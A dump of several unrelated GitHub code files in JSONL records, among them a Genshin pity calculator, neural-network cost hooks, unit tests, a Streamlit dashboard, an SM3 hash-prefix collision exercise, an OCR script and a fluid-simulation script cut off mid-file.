open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n print(f'{PITY4}' + f'{data[\"4*\"][0][\"pity\"]}' + f'\\n{LAST} 4*: ' + f'{data[\"4*\"][0][\"last\"]}')\n if data[\"4*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + f'{data[\"4*\"][0][\"next\"]}')\n data_.close()\n load = True\n else:\n print(f'{PITY4}' + f'{NO_WISH_HISTORY_ERROR} 4*' + f'\\n{LAST} 4*: ' + NO_WISH_HISTORY_ERROR2)\n load = True\n\n n4star = None\n\n for star4 in star4_:\n n_star4 = 10 - int(star4[0]) + 1\n if n_star4 <= 0:\n n_star4 = 1\n print(f'{PITY4}' + f'{n_star4} / 10' + f'\\n{LAST} 4*: ' + star4[1][5:])\n if f'{star4_[0]}'[-3] == 'r' and f'{star4_[1]}'[-3] == 'r':\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + 'Weapon')\n n4star = 'Weapon'\n elif f'{star4_[0]}'[-3] == 'n' and f'{star4_[1]}'[-3] == 'n':\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + 'Character')\n n4star = 'Character'\n break\n\n if load != True:\n if os.getenv('cache') == \"True\":\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json', 'w+', encoding='utf-8') as cach:\n ap = {}\n ap['5*'] = []\n ap['4*'] = []\n\n ap['5*'].append({\n 'last': star5[1][5:],\n 'pity': f'{n_star5} / {list_rec}',\n 'soft': isoft,\n 'next': n5star\n })\n\n ap['4*'].append({\n 'last': star4[1][5:],\n 'pity': f'{n_star4} / 10',\n 'next': n4star\n })\n json.dump(ap, cach, indent=4)\n cach.close()\n\n if REPEAT_FLAG == 'yes':\n print('----------------------------------------')\n sleep(int(os.getenv('sleep')))\n check_()\n elif REPEAT_FLAG == 'no':\n print('----------------------------------------' + '\\33[0m')\n user_input()\n\nglobal ISET\nISET = False\n\ndef user_input():\n global REPEAT_FLAG\n REPEAT_FLAG = os.getenv('repeat')\n try:\n banner = gs.get_banner_types(AUTH)\n except (gs.errors.AuthkeyTimeout, gs.errors.InvalidAuthkey):\n if S_MSG == False:\n print('\\33[31m' + AUTH_TIMEOUT + '\\33[0m')\n if str(os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')) == '[]':\n print('\\33[93m' + NOCACHE + '\\33[0m')\n quit()\n while True:\n print('\\33[93m' + LCACHE.replace('?nums?', str(os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc'))) + '\\33[0m')\n\n global ID_CACHE\n ID_CACHE = input(ID)\n\n if ID_CACHE == 'quit':\n quit()\n\n if ID_CACHE not in os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc'):\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n continue\n else:\n dict_prc = {74: '6.6%', 75: '12.6%', 76: '18.6%', 77: '24.6%', 78: '30.6%', 79: '36.6%', 80: '42.6%', 81: '48.6%', 82: '54.6%', 83: '60.6%', 84: '66.6%', 85: '72.6%', 86: '78.6%', 87: '84.6%', 88: '90.6%', 89: '96.6%', 90: '100%'}\n\n list_rec = 90\n if ID_CACHE[0:3] == '302':\n list_rec = 80\n\n print('\\33[34m----------------------------------------\\33[0m')\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{ID_CACHE[0:3]}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n isoft = int(data['5*'][0]['soft'])\n if list_rec == 80:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n else:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n\n print(f'{PITY5}' + f'{data[\"5*\"][0][\"pity\"]}' + f'\\n{LAST} 5*: ' + f'{data[\"5*\"][0][\"last\"]}')\n if data[\"5*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + f'{data[\"5*\"][0][\"next\"]}')\n print(f'{PITY4}' + f'{data[\"4*\"][0][\"pity\"]}' + f'\\n{LAST} 4*: ' + f'{data[\"4*\"][0][\"last\"]}')\n if data[\"4*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + f'{data[\"4*\"][0][\"next\"]}')\n data_.close()\n print('----------------------------------------')\n continue\n\n print(f'\\33[0m{banner}')\n print('\\33[33m' + QUIT_ + '\\33[0m')\n\n global BANNER\n global ISET\n\n if len(sys.argv) < 2:\n BANNER = input(ID)\n else:\n if ISET == False:\n print(ID + str(sys.argv[1]))\n BANNER = int(sys.argv[1])\n ISET = True\n else:\n BANNER = input(ID)\n\n try:\n BANNER = int(BANNER)\n\n if banner.get(BANNER) == None:\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n user_input()\n else:\n if REPEAT_FLAG == 'ask':\n print('\\33[31m' + REPEAT_W + '\\33[0m')\n r_a = ['no', 'yes']\n while True:\n REPEAT_FLAG = input(REPEAT)\n if REPEAT_FLAG not in r_a:\n print('\\33[31m' + REPEAT_ERROR2 + '\\33[0m')\n print('----------------------------------------')\n continue\n else:\n break\n print('\\33[34m' + '----------------------------------------')\n check_()\n except: \n if BANNER == 'quit':\n quit()\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n user_input()\n\nuser_input()","repo_name":"nitolar/genshin-pity-calculator","sub_path":"pity.py","file_name":"pity.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"46525762251","text":"import numpy as np\n\nMEMORY_MULTIPLIER = 4 # 4 bytes per variable\nLAST_DIMS = None\n\n\ndef get_attr(node, name, typ=\"ints\"):\n out = []\n for attr in node.attribute:\n if attr.name == name:\n for val in eval(\"attr.{}\".format(typ)):\n out.append(val)\n return tuple(out)\n\n\ndef conv_transpose_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n weight = node.weights[0].shape\n cin = weight[3]\n cout = weight[2]\n ops_per_output = cin\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef conv_hook(node, inputs, outputs):\n # NOTE: This method assumes shapes are ordered as NHWC\n if None in outputs and None not in inputs and node.padding == \"valid\":\n # Fill in unknown height and width. Note that padding = 0 for a \"valid\" Conv2D.\n H = int((inputs[1] - node.dilation_rate[0] * (node.kernel_size[0] - 1) - 1) /\n node.strides[0] + 1)\n W = int((inputs[2] - node.dilation_rate[1] * (node.kernel_size[1] - 1) - 1) /\n node.strides[1] + 1)\n newshape = (outputs[0], H, W, outputs[3])\n print(\"Inferred Conv2D shape: {} => {}\".format(outputs, newshape))\n outputs = newshape\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n weight = node.weights[0].shape\n # NHWC\n cout = weight[3]\n cin = weight[2]\n kernel = weight[:2]\n batch = inputs[0]\n ops_per_output = np.prod(kernel) * cin\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef depthwise_conv_hook(node, inputs, outputs):\n weight = node.weights[0].shape\n cout = weight[3]\n cin = weight[2]\n kernel = weight[:2]\n batch = inputs[0]\n ops_per_output = np.prod(kernel) # don't look at rest of input\n ops = ops_per_output * np.prod(outputs)\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef bn_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 4 * np.prod(inputs)\n return ops, mem_cost\n\n\ndef relu_hook(node, inputs, outputs):\n ops = np.prod(inputs)\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef pool_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n\n # ops_per_output = np.prod(kernel)\n ops_per_output = 0 # TODO fix\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef add_hook(node, inputs, outputs):\n assert len(inputs) > 1, \"add needs more than one input\"\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = sum([np.prod(inp) for inp in inputs])\n return ops, mem_cost\n\n\ndef pad_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef fc_hook(node, inputs, outputs):\n batch_size = inputs[0]\n cin = inputs[-1]\n cout = outputs[-1]\n\n ops = batch_size * cin * cout\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef concat_hook(node, inputs, outputs):\n assert len(inputs) > 1, \"cooncat needs more than one input\"\n ops = 0\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef reshape_hook(node, inputs, outputs):\n if outputs.count(None) == 1:\n # Compute missing dimension from inputs\n input_count = np.prod(inputs)\n output_count = np.prod([d for d in outputs if d is not None])\n missing_dim = input_count // output_count\n outputs = tuple(d if d is not None else missing_dim for d in outputs)\n assert np.prod(outputs) == input_count, \\\n \"Could not infer missing dimension in reshape output\"\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef upsample_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n if node.interpolation == \"nearest\":\n # Assuming 1 op per interpolated point.\n ops = np.prod(outputs)\n elif node.interpolation == \"bilinear\":\n # 5x cost heuristic from\n # http://web.pdx.edu/~jduh/courses/Archive/geog481w07/Students/Craver_Resampling.pdf\n ops = np.prod(outputs) * 5\n else:\n raise NotImplementedError(\"Unsupported interpolation method\")\n return ops, mem_cost\n\n\ndef dropout_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef pspnet_interp_hook(node, inputs, outputs):\n # Custom layer Interp used in keras_segmentation.models.pspnet_50\n # for bilinear interpolation\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = np.prod(outputs) * 5\n return ops, mem_cost\n\n\ndef pspnet_lambda_hook(node, inputs, outputs):\n # Assume channels are last. Check that this layer removes\n # one row and one column from the input, which is how\n # Lambda is used in PSPNet.\n assert inputs[0] == outputs[0] and inputs[3] == outputs[3]\n assert inputs[1] == outputs[1] + 1\n assert inputs[2] == outputs[2] + 1\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return 0, mem_cost\n\n\n# todo concatenate\n# todo flatten\nhooks = {\n # General hooks\n 'Conv2D': conv_hook,\n 'Conv2DTranspose': conv_transpose_hook,\n 'Cropping2D': pool_hook, # TODO fix\n 'DepthwiseConv2D': depthwise_conv_hook,\n 'BatchNormalization': bn_hook,\n 'Activation': relu_hook,\n 'ReLU': relu_hook,\n 'MaxPooling2D': pool_hook,\n 'Dropout': dropout_hook,\n 'Concatenate': concat_hook,\n 'Add': add_hook,\n 'GlobalAveragePooling2D': pool_hook,\n 'AveragePooling2D': pool_hook,\n # 'Shape': shape_hook,\n 'Flatten': reshape_hook,\n 'Concat': concat_hook,\n 'Reshape': reshape_hook,\n 'UpSampling2D': upsample_hook,\n 'Dense': fc_hook,\n # 'Gemm': gemm_hook,\n # 'Squeeze' : reshape_hook,\n 'ZeroPadding2D': pad_hook,\n\n # Model specific hooks\n 'Interp': pspnet_interp_hook,\n 'Lambda': pspnet_lambda_hook,\n}\n\n\ndef add_batch(tup, b):\n if tup[0] is None:\n lst = list(tup)\n lst[0] = b\n return tuple(lst)\n return tup\n\n\ndef op_hook(layer, batch_size=1):\n input_shapes = layer.input_shape\n output_shapes = layer.output_shape\n\n if type(input_shapes) == tuple:\n inputs = add_batch(input_shapes, batch_size)\n elif type(input_shapes) == list:\n inputs = []\n for input_shape in input_shapes:\n inputs.append(add_batch(input_shape, batch_size))\n else:\n raise ValueError(\"layer.input_shapes must be tuple or list\")\n\n if type(output_shapes) == tuple:\n outputs = add_batch(output_shapes, batch_size)\n elif type(output_shapes) == list:\n outputs = []\n for output_shape in output_shapes:\n outputs.append(add_batch(output_shape, batch_size))\n else:\n raise ValueError(\"layer.output_shape must be tuple or list\")\n\n # Shape checks\n if len(inputs) == 0 or len(outputs) == 0:\n print(\"WARN: No inputs or no outputs?\", type(layer),\n \"input shape:\", inputs, \"output shape:\", outputs)\n\n if None in inputs or None in outputs:\n print(\"WARN: Layer of type {} has None in shape\".format(type(layer)),\n \"input shape:\", inputs, \"output shape:\", outputs)\n\n ops, mem_cost = hooks[layer.__class__.__name__](layer, inputs, outputs)\n return ops, mem_cost\n","repo_name":"uwsampl/dtr-prototype","sub_path":"checkmate_comp/remat/tensorflow2/extraction_hooks.py","file_name":"extraction_hooks.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"45"} +{"seq_id":"9874996510","text":"import os\nimport unittest\n\nfrom coala_langserver.diagnostic import output_to_diagnostics\n\n\ndef get_output(filename):\n file_path = os.path.join(os.path.dirname(__file__),\n 'resources/diagnostic',\n filename)\n with open(file_path, 'r') as file:\n output = file.read()\n return output\n\n\nclass DiagnosticTestCase(unittest.TestCase):\n\n def test_none_output(self):\n result = output_to_diagnostics(None)\n self.assertEqual(result, None)\n\n def test_severity_info(self):\n output = get_output('output_severity_info.json')\n result = output_to_diagnostics(output)\n\n # INFO: 0 (coala) -> Information: 3 (LSP)\n self.assertEqual(result[0]['severity'], 3)\n\n def test_severity_normal(self):\n output = get_output('output_severity_normal.json')\n result = output_to_diagnostics(output)\n\n # NORMAL: 1 (coala) -> Warning: 2 (LSP)\n self.assertEqual(result[0]['severity'], 2)\n\n def test_severity_major(self):\n output = get_output('output_severity_major.json')\n result = output_to_diagnostics(output)\n\n # MAJOR: 2 (coala) -> Error: 1 (LSP)\n self.assertEqual(result[0]['severity'], 1)\n\n def test_char_none(self):\n output = get_output('output_char_none.json')\n result = output_to_diagnostics(output)\n\n # None column should be regarded as the whole line\n start_line = result[0]['range']['start']['line']\n start_char = result[0]['range']['start']['character']\n end_line = result[0]['range']['end']['line']\n end_char = result[0]['range']['end']['character']\n self.assertEqual(start_char, 0)\n self.assertEqual(end_char, 0)\n self.assertEqual(start_line + 1, end_line)\n\n def test_normal_offset(self):\n output = get_output('output_normal_offset.json')\n result = output_to_diagnostics(output)\n\n # normal offset, one-based -> zero-based\n start_line = result[0]['range']['start']['line']\n start_char = result[0]['range']['start']['character']\n end_line = result[0]['range']['end']['line']\n end_char = result[0]['range']['end']['character']\n self.assertEqual(start_char, 0)\n self.assertEqual(end_char, 1)\n self.assertEqual(start_line, 0)\n self.assertEqual(end_line, 0)\n\n def test_multiple_problems(self):\n output = get_output('output_multiple_problems.json')\n result = output_to_diagnostics(output)\n\n # should be able to handle multiple bears & problems\n self.assertEqual(len(result), 3)\n","repo_name":"coala/coala-ls","sub_path":"tests/test_diagnostic.py","file_name":"test_diagnostic.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"26908950850","text":"from enum import Enum, auto\n\nimport pytest\n\nimport streamson\nfrom streamson.handler import BufferHandler, PythonConverterHandler\nfrom streamson.output import Output\n\n\nclass Kind(Enum):\n FD = auto()\n ITER = auto()\n\n\n@pytest.mark.parametrize(\n \"kind,convert\",\n [\n (Kind.FD, None),\n (Kind.FD, lambda x: x),\n (Kind.FD, lambda x: f\"X{x.decode()}X\".encode()),\n (Kind.ITER, None),\n (Kind.ITER, lambda x: x),\n (Kind.ITER, lambda x: f\"X{x.decode()}X\".encode()),\n ],\n ids=[\n \"fd-raw\",\n \"fd-same\",\n \"fd-xx\",\n \"iter-raw\",\n \"iter-same\",\n \"iter-xx\",\n ],\n)\ndef test_simple(io_reader, data, kind, convert):\n matcher = streamson.SimpleMatcher('{\"users\"}[]')\n buff_handler = BufferHandler()\n handler = PythonConverterHandler(convert) + buff_handler if convert else buff_handler\n\n if kind == Kind.ITER:\n filtered = streamson.filter_iter((e for e in data), [(matcher, handler)])\n elif kind == Kind.FD:\n filtered = streamson.filter_fd(io_reader, [(matcher, handler)], 5)\n\n output = Output(filtered).generator()\n assert next(output) == (None, b'{\"users\": [], \"groups\": [\"admins\", \"users\"]}')\n with pytest.raises(StopIteration):\n next(output)\n\n convert = convert if convert else (lambda x: x)\n assert buff_handler.pop_front() == ('{\"users\"}[0]', [e for e in convert(b'\"john\"')])\n assert buff_handler.pop_front() == ('{\"users\"}[1]', [e for e in convert(b'\"carl\"')])\n assert buff_handler.pop_front() == ('{\"users\"}[2]', [e for e in convert(b'\"bob\"')])\n assert buff_handler.pop_front() is None\n","repo_name":"shenek/python-streamson","sub_path":"tests/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25595840648","text":"import asyncio\r\nimport sys\r\n\r\nimport streamlit as st\r\n\r\nfrom arguments_parser import Params, parse\r\nfrom dashboard.page1 import factory_dashboard\r\nfrom dashboard.page2 import production_work_history_dashboard\r\nfrom dashboard.page3 import factory_chatbot\r\n\r\nPAGE1 = '全体状況'\r\nPAGE2 = '製造ライン作業履歴'\r\nPAGE3 = '製造ライン情報Chatbot'\r\n\r\n\r\nasync def main(param: Params):\r\n st.set_page_config(\r\n page_title='manufacturing-line-dashboard-with-surrealdb',\r\n layout='wide',\r\n )\r\n\r\n selected_menu = st.sidebar.radio(\"メニュー\", [PAGE1, PAGE2, PAGE3])\r\n st.sidebar.markdown('---')\r\n\r\n if selected_menu == PAGE1:\r\n await factory_dashboard.run(param)\r\n\r\n elif selected_menu == PAGE2:\r\n await production_work_history_dashboard.run(param)\r\n\r\n elif selected_menu == PAGE3:\r\n await factory_chatbot.run(param)\r\n\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n # [引数]\r\n # [--server localhost] SurrealDB ホスト名\r\n # [--prot 8000] SurrealDB ポート番号\r\n # [--namespace test] SurrealDB 名前空間名\r\n # [--database test] SurrealDB データベース名\r\n # [--user root] SurrealDB 認証ユーザ\r\n # [--PW root] SurrealDB 認証ユーザ パスワード\r\n args = sys.argv\r\n param = parse(args=args[1:])\r\n asyncio.run(main(param))\r\n","repo_name":"tmarumaru/SurrealDB-FactoryDemo","sub_path":"main/dashboard/dashboard_main.py","file_name":"dashboard_main.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9541326220","text":"def gameOfThrones(s):\r\n # Write your code here\r\n even = 0\r\n odd = 0\r\n t = []\r\n for i in s:\r\n if s.count(i)%2==0:\r\n if i not in t:\r\n even+=1\r\n t.append(i)\r\n else:\r\n if i not in t:\r\n odd+=1\r\n t.append(i)\r\n if odd>1:\r\n print(\"NO\")\r\n elif odd>=0 and even==0:\r\n print(\"NO\")\r\n else:\r\n print(\"YES\")\r\ns = input()\r\n\r\nresult = gameOfThrones(s)\r\n","repo_name":"Surendra0008/hackerrank","sub_path":"Game of Thrones-1.py","file_name":"Game of Thrones-1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20140047270","text":"from PIL import Image\nimport cv2\nimport pytesseract\nimport os\nimport numpy as np\nimport pandas as pd\nimport re\nfrom pdf2image import convert_from_bytes\n\ndef get_conf(page_gray):\n df = pytesseract.image_to_data(page_gray, output_type='data.frame')\n df.drop(df[df.conf==-1].index.values,inplace=True)\n df.reset_index()\n return df.conf.mean()\n\ndef deskew(image):\n gray = cv2.bitwise_not(image)\n temp_arr = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(temp_arr>0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n return rotated\n\nOCR_dic = {}\nfile_list = ['vsco.pdf']\n\nfor file in file_list:\n pdf_file = convert_from_bytes(open(os.path.join('/Users/sameepshah/Documents/Vardhaman Surgical Co./python_parsing',file), 'rb').read())\n # create a df to save each pdf's text\n pages_df = pd.DataFrame(columns=['conf','text'])\n for (i,page) in enumerate(pdf_file) :\n try:\n # transfer image of pdf_file into array\n page_arr = np.asarray(page)\n # transfer into grayscale\n page_arr_gray = cv2.cvtColor(page_arr,cv2.COLOR_BGR2GRAY)\n # deskew the page\n page_deskew = deskew(page_arr_gray)\n # cal confidence value\n page_conf = get_conf(page_deskew)\n # extract string\n new_row = pd.DataFrame(columns=['conf' 'text'], data={'conf': page_conf,'text': pytesseract.image_to_string(page_deskew)})\n pages_df = pd.concat([pages_df, new_row], ignore_index=True)\n except:\n # if can't extract then give some notes into df\n new_row = pd.DataFrame(columns=['conf' 'text'], data={'conf':-1, 'text': 'N/A'})\n pages_df = pd.concat([pages_df, new_row], ignore_index=True)\n continue\n # save df into a dict with filename as key \n OCR_dic[file]=pages_df\n print('{} is done'.format(file))\n \nprint(OCR_dic[file_list[1]])","repo_name":"sameep-git/vscowebsite","sub_path":"python_parsing/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26506408490","text":"import time\nimport random\nfrom gmssl import sm3, func\ndef my_sm3(m):\n #input number\n m = hex(m)[2:]\n m = bytes(m, encoding=\"utf8\")\n m = sm3.sm3_hash(func.bytes_to_list(m))\n return m\n\n\ndef rho_method(n):\n m = random.randint(0, 0xffffff)\n dict={}\n for i in range(2**256):\n original_m = m\n temp=bytes(hex(m)[2:], encoding=\"utf8\")\n m = my_sm3(m)\n dict[m[:n]]=original_m\n m = (2 * original_m + 1)\n if my_sm3(m)[:n] in dict.keys():\n print(\"找到碰撞\")\n print(bytes(hex(m)[2:], encoding=\"utf8\"))\n print(bytes(hex(dict[my_sm3(m)[:n]])[2:], encoding=\"utf8\"))\n print(\"查找了{0}次\".format(i))\n return\n print(\"失败\")\n\nif __name__==\"__main__\":\n start=time.time()\n rho_method(4)\n end=time.time()\n print(\"运行时间为:{0}\".format(end-start))\n","repo_name":"Chocker926/Security_in_action","sub_path":"SM3_Rho/SM3_Rho.py","file_name":"SM3_Rho.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35619342920","text":"from flask import request, abort, g\r\nfrom controller import bp, db\r\nfrom controller.model import Post, get_url_post, get_time_to_read, Comment\r\nfrom datetime import datetime\r\nfrom controller.auth import token_auth\r\nfrom bson.objectid import ObjectId\r\nimport pymongo\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n@bp.route('/topuser', methods=['GET'])\r\n@token_auth.login_required(optional=True)\r\ndef get_top_user():\r\n try:\r\n res = {}\r\n query = db[\"user\"].aggregate([\r\n {\r\n \"$project\":{\r\n \"_id\" : 1,\r\n \"username\" : 1,\r\n \"display_name\" : 1,\r\n \"email\" : 1,\r\n \"link_facebook\": 1,\r\n \"avatar\": 1,\r\n \"bio\": 1,\r\n \"post\" : { \"$sum\" : \"$list_post\"}\r\n }\r\n },{\r\n \"$sort\":{\r\n \"post\" : -1\r\n }\r\n },{\r\n \"$limit\" : 20\r\n },{\r\n \"$project\" :{\r\n \"_id\" : 1,\r\n \"username\" : 1,\r\n \"display_name\" : 1,\r\n \"email\" : 1,\r\n \"link_facebook\": 1,\r\n \"avatar\": 1,\r\n \"bio\": 1,\r\n }\r\n }\r\n ])\r\n if(query != None):\r\n list_top_user = list(query)\r\n list_res = []\r\n for row_data in list_top_user:\r\n temp_res ={}\r\n temp_res[\"_id\"] = str(row_data[\"_id\"])\r\n temp_res[\"username\"] = str(row_data[\"username\"])\r\n temp_res[\"display_name\"] = str(row_data[\"display_name\"])\r\n temp_res[\"email\"] = str(row_data[\"email\"])\r\n temp_res[\"link_facebook\"] = str(row_data[\"link_facebook\"])\r\n temp_res[\"avatar\"] = str(row_data[\"avatar\"])\r\n temp_res[\"bio\"] = str(row_data[\"bio\"])\r\n list_res.append(temp_res)\r\n res[\"data\"] = list_res\r\n return res \r\n except Exception as exc:\r\n print(f\"Error: {exc}\")\r\n abort(401)","repo_name":"nghialuffy/write_down_project","sub_path":"backend/controller/top_user.py","file_name":"top_user.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34763592136","text":"import sys\nimport time\nimport socket\nimport pickle\nfrom diffpiso import *\nfrom diffpiso.networks import initialise_fullyconv_network\nfrom diffpiso.losses import *\n\nbase_path = '../learnedTurbulenceModelling_data/spatialMixingLayer/' # set base directory where dataset is located/ simulation will be stored\n\nstarting_frame = 0\ntimesteps = 2500\n\nlearning_dir = '' # set directory where model is stored\nmodel_id = '' # set model number (id scheme in learning: EEEEEEiXXXXXX with E as epoch number and X as iteration number)\n\ndef neural_network_wrapper(neural_network, input, fluid, physical_parameters, simulation_parameters, loss_buffer_width, buffer_width):\n sponge_start = int(simulation_parameters['HRres'][1] * simulation_parameters['sponge_ratio']) // simulation_parameters['dx_ratio']\n NN_in = input[:, :, :sponge_start, :]\n NN_out = tf.pad(neural_network(NN_in), ((0, 0), (0, 0), (0, fluid.resolution[1] - sponge_start), (0, 0)))\n return NN_out\n\nphysical_parameters = {'average_velocity': 1,\n 'velocity_difference': 1,\n 'inlet_profile_sharpness': 2,\n 'viscosity': .002}\n\nsimulation_parameters = {'HRres': [64,64*4], # [512,512*4],\n 'dx_ratio': 1, # 8,\n 'differentiation_scheme': 'central_difference_new',\n 'dt': .05,\n 'dt_ratio': 1, # 8,\n 'box': box[0:64,0:64*4],\n 'sponge_ratio': .875,\n 'relative_sponge_max': 20}\n\ntraining_dict = {'step_count': 1,\n 'grad_stop': 0,\n 'artificial_batch': 1,\n 'epochs': 5,\n 'dataset': base_path+'/sml_HR_512-2048_dx8_dt8_pert0.082-0.018/',\n 'dataset_characteristics': [(0.082,0.018)],\n 'start_frame': 8010,\n 'frame_count_training': 27000,\n 'frame_count_validation': 4900,\n 'perturb_inlet': True,\n 'pressure_included': True,\n 'network_initialiser': initialise_fullyconv_network,\n 'padding': 'VALID',\n 'load_model_path': base_path+learning_dir+'/model_epoch_'+model_id+'.ckpt',\n 'loss_functions': [L2_field_loss],\n 'loss_factor': [1],\n 'HR_buffer_width': [[0, 0], [0, 0]],\n 'data_shuffling_seeds': None,\n 'start_first_epoch_at': 0,\n 'learning_rate': 8e-6,\n 'lr_decay_fun': lambda l: l*.8,\n 'store_interm_ckpts': 200,\n 'staggered_formulation': False\n }\n\nbuffer_width = [[i // simulation_parameters['dx_ratio'] for i in j] for j in training_dict['HR_buffer_width']]\nsponge_start = int(simulation_parameters['HRres'][1] * simulation_parameters['sponge_ratio']) // simulation_parameters['dx_ratio'] # //2\n\nsolver_precision = 1e-8\ndomain, sim_physics, pressure_solver, velocity_placeholder, velocity, pressure_placeholder, pressure, viscosity_field, bc_placeholders, bcx= \\\n spatialMixingLayer_setup(simulation_parameters, solver_precision, physical_parameters, 1)\n\n# NN DEFINITION -------------------------------------------------------------------------------------------------\nif (training_dict['load_model_path']is None):\n load_model_path = base_path + '/model_epoch_'+str(training_dict['epochs']-1).zfill(6)+'.ckpt'\nelse:\n load_model_path = training_dict['load_model_path']\n\nprint('LOAD MODEL PATH',load_model_path)\nassert training_dict['network_initialiser'] is not None\nneural_network, weights, loss_buffer_width = \\\n training_dict['network_initialiser'](buffer_width=buffer_width, padding=training_dict['padding'], restore_shape=True)\nsaver = tf.train.Saver(weights)\n\ndirichlet_placeholder_update = lambda dv, tf_pl: update_dirichlet_values(dv,((False, False), (True, False)),tf_pl)\n\nvelocity_all_steps, pressure_all_steps, nn_all_steps, velnew, pnew, NN_out,warn, velocity_all_arrays, pressure_all_arrays = \\\n run_piso_steps(velocity, pressure, domain, physical_parameters, simulation_parameters, training_dict, neural_network,neural_network_wrapper,\n sim_physics, viscosity_field, bcx, bc_placeholders,\n dirichlet_placeholder_update=dirichlet_placeholder_update, loss_buffer_width=loss_buffer_width)\nvelnew_data = velnew.staggered_tensor()\npnew_data = pnew.data\nresidual_force_data = NN_out\n\ndef boundary_perturbation_fun_new(shape,time):\n return boundary_perturbation_fun(domain, physical_parameters['average_velocity'], shape, time, training_dict['dataset_characteristics'][0])\n\ntf.Graph.finalize(tf.get_default_graph())\n\n# SIMULATION RUN -------------------------------------------------------------------------------------------------\nperformance = []\nsession_config = tf.ConfigProto()\nsession_config.gpu_options.allow_growth = True\nwith tf.Session(config=session_config) as sess:\n if load_model_path is not None and training_dict['network_initialiser'] is not None:\n print('LOAD MODEL PATH', load_model_path)\n saver.restore(sess, 